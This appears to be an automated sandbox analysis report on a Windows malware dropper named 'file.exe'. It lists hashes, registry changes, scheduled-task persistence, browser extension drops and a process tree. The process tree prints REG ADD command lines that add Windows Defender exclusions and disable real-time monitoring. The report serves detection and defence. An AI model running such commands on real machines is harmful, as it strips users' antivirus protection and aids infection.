Analysis
-
max time kernel
123s -
max time network
131s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
04-11-2022 08:17
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220812-en
General
-
Target
file.exe
-
Size
7.2MB
-
MD5
c104e431c084587ed2dc8c447b410c9c
-
SHA1
f92d07d0d6bdeb2de00828d89b826dd215192a04
-
SHA256
4346bb66ea4faac2c329b2cb9ed9f38e8f704baa5c7576295a526792bf007ace
-
SHA512
bd78250b14febf10fa80f2c47e823f6037e93b0e87f26934dfd1b49dae053961048c4bd5ef51f2c839d17ac050a861d6e87f5bab592306103f256ec724eb1eba
-
SSDEEP
196608:91O0BHMSmQg+se1Ysn2uLGWDyJUn5XFi87iW:3O0BsSmQnz1vnBKWmOnHR7J
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\lVNrrOatpBrXIgYLG = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\lVNrrOatpBrXIgYLG = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\XracVvRTBJUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\nNoOyOjreWgVC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\DIqJuicHJdmqOkVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\dEvNveGTTlDzBjVk = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\PTcVEVWfzVfU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\SnQMkCffU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\XracVvRTBJUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\nNoOyOjreWgVC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\dEvNveGTTlDzBjVk = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\dEvNveGTTlDzBjVk = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\dEvNveGTTlDzBjVk = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\PLSiPWpMcbIKVQxaRhR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\SnQMkCffU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\PLSiPWpMcbIKVQxaRhR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\DIqJuicHJdmqOkVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\PTcVEVWfzVfU2 = "0" reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 21 1616 rundll32.exe -
Executes dropped EXE 4 IoCs
pid Process 1956 Install.exe 960 Install.exe 524 NhYRGfZ.exe 1988 UFrutAS.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Control Panel\International\Geo\Nation UFrutAS.exe -
Loads dropped DLL 12 IoCs
pid Process 1080 file.exe 1956 Install.exe 1956 Install.exe 1956 Install.exe 1956 Install.exe 960 Install.exe 960 Install.exe 960 Install.exe 1616 rundll32.exe 1616 rundll32.exe 1616 rundll32.exe 1616 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json UFrutAS.exe -
Drops file in System32 directory 19 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol NhYRGfZ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA UFrutAS.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol NhYRGfZ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA UFrutAS.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_5C3F4CB4665DCF2109A8C91DBA78E447 UFrutAS.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat UFrutAS.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA UFrutAS.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_A49E2928C282F3D7B74BA1083F81B152 UFrutAS.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_A49E2928C282F3D7B74BA1083F81B152 UFrutAS.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol UFrutAS.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini NhYRGfZ.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA UFrutAS.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_5C3F4CB4665DCF2109A8C91DBA78E447 UFrutAS.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files (x86)\PTcVEVWfzVfU2\aHbtFMj.xml UFrutAS.exe File created C:\Program Files (x86)\PLSiPWpMcbIKVQxaRhR\euhhLVc.xml UFrutAS.exe File created C:\Program Files (x86)\nNoOyOjreWgVC\OpXNFhy.dll UFrutAS.exe File created C:\Program Files (x86)\SnQMkCffU\sMaPmC.dll UFrutAS.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi UFrutAS.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak UFrutAS.exe File created C:\Program Files (x86)\SnQMkCffU\AfJQDrI.xml UFrutAS.exe File created C:\Program Files (x86)\PTcVEVWfzVfU2\UskMXasPXmHCR.dll UFrutAS.exe File created C:\Program Files (x86)\nNoOyOjreWgVC\rOPsWNR.xml UFrutAS.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi UFrutAS.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja UFrutAS.exe File created C:\Program Files (x86)\PLSiPWpMcbIKVQxaRhR\ANtcEDw.dll UFrutAS.exe File created C:\Program Files (x86)\XracVvRTBJUn\mjpPrtw.dll UFrutAS.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bmPPeHndeZJiZewMwY.job schtasks.exe File created C:\Windows\Tasks\VxfUuShlQNbdQSXLl.job schtasks.exe File created C:\Windows\Tasks\OwLyLJfWgdznQZv.job schtasks.exe File created C:\Windows\Tasks\UjaziEjLbJEPTlLHt.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1336 schtasks.exe 1752 schtasks.exe 2000 schtasks.exe 1172 schtasks.exe 1552 schtasks.exe 648 schtasks.exe 1560 schtasks.exe 1436 schtasks.exe 1176 schtasks.exe 1436 schtasks.exe 1872 schtasks.exe 556 schtasks.exe 828 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\f2-af-a8-72-a6-9f UFrutAS.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates UFrutAS.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root UFrutAS.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust UFrutAS.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\f2-af-a8-72-a6-9f\WpadDetectedUrl rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing UFrutAS.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA UFrutAS.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs UFrutAS.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs UFrutAS.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs UFrutAS.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs UFrutAS.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\f2-af-a8-72-a6-9f\WpadDecision = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA UFrutAS.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs UFrutAS.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs UFrutAS.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs UFrutAS.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates UFrutAS.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust UFrutAS.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs UFrutAS.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\f2-af-a8-72-a6-9f\WpadDecisionReason = "1" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs UFrutAS.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs UFrutAS.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates UFrutAS.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates UFrutAS.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed UFrutAS.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs UFrutAS.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 UFrutAS.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4A01D085-5754-48FB-972D-8E7ADC1DF6F8}\WpadDecisionReason = "1" UFrutAS.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4A01D085-5754-48FB-972D-8E7ADC1DF6F8}\WpadNetworkName = "Network 2" UFrutAS.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates UFrutAS.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4A01D085-5754-48FB-972D-8E7ADC1DF6F8}\f2-af-a8-72-a6-9f rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" UFrutAS.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad UFrutAS.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4A01D085-5754-48FB-972D-8E7ADC1DF6F8} UFrutAS.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4A01D085-5754-48FB-972D-8E7ADC1DF6F8}\f2-af-a8-72-a6-9f UFrutAS.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates UFrutAS.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs UFrutAS.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4A01D085-5754-48FB-972D-8E7ADC1DF6F8}\WpadDecision = "0" UFrutAS.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My UFrutAS.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs UFrutAS.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs UFrutAS.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed UFrutAS.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs UFrutAS.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot UFrutAS.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates UFrutAS.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople UFrutAS.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections UFrutAS.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 UFrutAS.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4A01D085-5754-48FB-972D-8E7ADC1DF6F8}\WpadDecisionTime = 101b97802ef0d801 UFrutAS.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates UFrutAS.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs UFrutAS.exe -
Suspicious behavior: EnumeratesProcesses 28 IoCs
pid Process 552 powershell.EXE 552 powershell.EXE 552 powershell.EXE 580 powershell.EXE 580 powershell.EXE 580 powershell.EXE 316 powershell.EXE 316 powershell.EXE 316 powershell.EXE 1520 powershell.EXE 1520 powershell.EXE 1520 powershell.EXE 1988 UFrutAS.exe 1988 UFrutAS.exe 1988 UFrutAS.exe 1988 UFrutAS.exe 1988 UFrutAS.exe 1988 UFrutAS.exe 1988 UFrutAS.exe 1988 UFrutAS.exe 1988 UFrutAS.exe 1988 UFrutAS.exe 1988 UFrutAS.exe 1988 UFrutAS.exe 1988 UFrutAS.exe 1988 UFrutAS.exe 1988 UFrutAS.exe 1988 UFrutAS.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 552 powershell.EXE Token: SeDebugPrivilege 580 powershell.EXE Token: SeDebugPrivilege 316 powershell.EXE Token: SeDebugPrivilege 1520 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1080 wrote to memory of 1956 1080 file.exe 28 PID 1080 wrote to memory of 1956 1080 file.exe 28 PID 1080 wrote to memory of 1956 1080 file.exe 28 PID 1080 wrote to memory of 1956 1080 file.exe 28 PID 1080 wrote to memory of 1956 1080 file.exe 28 PID 1080 wrote to memory of 1956 1080 file.exe 28 PID 1080 wrote to memory of 1956 1080 file.exe 28 PID 1956 wrote to memory of 960 1956 Install.exe 29 PID 1956 wrote to memory of 960 1956 Install.exe 29 PID 1956 wrote to memory of 960 1956 Install.exe 29 PID 1956 wrote to memory of 960 1956 Install.exe 29 PID 1956 wrote to memory of 960 1956 Install.exe 29 PID 1956 wrote to memory of 960 1956 Install.exe 29 PID 1956 wrote to memory of 960 1956 Install.exe 29 PID 960 wrote to memory of 584 960 Install.exe 31 PID 960 wrote to memory of 584 960 Install.exe 31 PID 960 wrote to memory of 584 960 Install.exe 31 PID 960 wrote to memory of 584 960 Install.exe 31 PID 960 wrote to memory of 584 960 Install.exe 31 PID 960 wrote to memory of 584 960 Install.exe 31 PID 960 wrote to memory of 584 960 Install.exe 31 PID 960 wrote to memory of 992 960 Install.exe 33 PID 960 wrote to memory of 992 960 Install.exe 33 PID 960 wrote to memory of 992 960 Install.exe 33 PID 960 wrote to memory of 992 960 Install.exe 33 PID 960 wrote to memory of 992 960 Install.exe 33 PID 960 wrote to memory of 992 960 Install.exe 33 PID 960 wrote to memory of 992 960 Install.exe 33 PID 992 wrote to memory of 1720 992 forfiles.exe 35 PID 992 wrote to memory of 1720 992 forfiles.exe 35 PID 992 wrote to memory of 1720 992 forfiles.exe 35 PID 992 wrote to memory of 1720 992 forfiles.exe 35 PID 992 wrote to memory of 1720 992 forfiles.exe 35 PID 992 wrote to memory of 1720 992 forfiles.exe 35 PID 992 wrote to memory of 1720 992 forfiles.exe 35 PID 584 wrote to memory of 776 584 forfiles.exe 38 PID 584 wrote to memory of 776 584 forfiles.exe 38 PID 584 wrote to memory of 776 584 forfiles.exe 38 PID 584 wrote to memory of 776 584 forfiles.exe 38 PID 584 wrote to memory of 776 584 forfiles.exe 38 PID 584 wrote to memory of 776 584 forfiles.exe 38 PID 584 wrote to memory of 776 584 forfiles.exe 38 PID 1720 wrote to memory of 292 1720 cmd.exe 37 PID 1720 wrote to memory of 292 1720 cmd.exe 37 PID 1720 wrote to memory of 292 1720 cmd.exe 37 PID 1720 wrote to memory of 292 1720 cmd.exe 37 PID 1720 wrote to memory of 292 1720 cmd.exe 37 PID 1720 wrote to memory of 292 1720 cmd.exe 37 PID 1720 wrote to memory of 292 1720 cmd.exe 37 PID 776 wrote to memory of 1700 776 cmd.exe 36 PID 776 wrote to memory of 1700 776 cmd.exe 36 PID 776 wrote to memory of 1700 776 cmd.exe 36 PID 776 wrote to memory of 1700 776 cmd.exe 36 PID 776 wrote to memory of 1700 776 cmd.exe 36 PID 776 wrote to memory of 1700 776 cmd.exe 36 PID 776 wrote to memory of 1700 776 cmd.exe 36 PID 776 wrote to memory of 2020 776 cmd.exe 40 PID 1720 wrote to memory of 1280 1720 cmd.exe 39 PID 776 wrote to memory of 2020 776 cmd.exe 40 PID 776 wrote to memory of 2020 776 cmd.exe 40 PID 1720 wrote to memory of 1280 1720 cmd.exe 39 PID 1720 wrote to memory of 1280 1720 cmd.exe 39 PID 1720 wrote to memory of 1280 1720 cmd.exe 39 PID 776 wrote to memory of 2020 776 cmd.exe 40
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1080 -
C:\Users\Admin\AppData\Local\Temp\7zS252.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1956 -
C:\Users\Admin\AppData\Local\Temp\7zS83C.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:960 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:584 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:776 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:2020
-
-
-
-
